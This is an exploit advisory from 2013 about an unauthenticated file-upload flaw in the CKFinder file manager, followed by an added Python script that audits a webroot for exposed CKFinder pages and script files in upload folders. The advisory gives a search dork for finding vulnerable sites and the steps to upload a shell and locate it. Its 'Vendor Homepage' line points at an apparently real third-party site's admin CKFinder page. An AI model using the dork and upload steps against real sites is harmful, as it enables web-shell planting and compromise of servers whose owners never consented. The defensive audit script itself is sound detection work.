CKfinder File Upload Vulnerability

2013-10-22 22:47:51
Posted by: 1 Cyber Team

In The Name Of GOD

[+] Exploit Title : CKfinder File Upload Vulnerability
[+] Date : 2013
[+] Software Link : http://cksource.com/ckfinder
[+] Version : 2.0 & 4.0
[+] Security Risk : High
[+] Author : Whit_eagle, E1.Coders
[+] Website : 1cyberteam.com
[+] Dork : inurl:ckfinder/ckfinder.html
[+] Tested on : Windows
[+] Vendor Homepage: http://tigerbeerus.com/admin/includes/ckfinder/ckfinder.html
---------------------------------------------------------
1. Go to the page:

http://target.com/[PATH]/ckfinder/ckfinder.html


2. The uploaded file or shell is then at:

http://target.com/[PATH]/fckimages/files/uploaded file.jpg or .php
http://target.com/[PATH]/userfiles/files/uploaded file.jpg or .php

Or right-click the uploaded file, select View, and copy the link from the URL.
----------------------------------------------------------------------------------------------
Thanks from Mori, Linux Man
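
A defender's audit for the two conditions the steps above depend on, as an added example that is not part of the original advisory or of CKFinder: a web-served ckfinder.html page, and script-type files sitting in the userfiles/files or fckimages/files upload directories. The suffix list, the function names and the sample tree are assumptions constructed for the demonstration.

```python
import os
import tempfile

# Upload directories named in the advisory, relative to the site path.
UPLOAD_DIRS = ("userfiles/files", "fckimages/files")
# Assumed list of suffixes a PHP-enabled server may execute or obey; adjust to your handlers.
RISKY_SUFFIXES = {".php", ".phtml", ".php5", ".phar", ".htaccess"}


def audit_webroot(webroot):
    """Return (exposed_ui_pages, risky_uploads) as sorted paths relative to webroot."""
    exposed_ui, risky = [], []
    for dirpath, _dirs, files in os.walk(webroot):
        rel = os.path.relpath(dirpath, webroot).replace(os.sep, "/")
        # Step 1 of the advisory: the file-manager page is served from a web directory.
        if rel.split("/")[-1].lower() == "ckfinder" and "ckfinder.html" in files:
            exposed_ui.append(rel + "/ckfinder.html")
        # Step 2: uploads land in these directories (subfolders included).
        if any("/" + d + "/" in "/" + rel + "/" for d in UPLOAD_DIRS):
            for name in files:
                # Test every dot-separated part so "x.php.jpg" is flagged as well.
                suffixes = {"." + part.lower() for part in name.split(".")[1:]}
                if suffixes & RISKY_SUFFIXES:
                    risky.append(rel + "/" + name)
    return sorted(exposed_ui), sorted(risky)


def build_sample_tree(root):
    """Create a small constructed site layout for the demonstration."""
    sample = [
        "site/ckfinder/ckfinder.html",
        "site/userfiles/files/logo.jpg",
        "site/userfiles/files/notes.PHP",
        "site/userfiles/files/2013/photo.php.jpg",
        "site/fckimages/files/.htaccess",
        "site/index.php",  # application code outside the upload dirs is not flagged
    ]
    for path in sample:
        full = os.path.join(root, *path.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        open(full, "w").close()


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        ui, risky = audit_webroot(root)
        print("Exposed UI pages:", ui)
        print("Risky files in upload dirs:", risky)
```

Any hit in the second list is worth investigating, since image and document upload folders have no reason to hold server-side scripts or .htaccess files.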

Fixes

No fixes